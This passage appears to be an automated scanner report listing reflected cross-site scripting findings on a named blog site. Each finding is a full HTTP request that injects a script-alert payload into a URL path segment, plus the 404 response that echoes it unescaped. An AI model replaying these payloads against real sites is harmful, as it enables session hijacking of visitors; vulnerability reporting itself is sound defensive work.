GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p> ...[SNIP]...
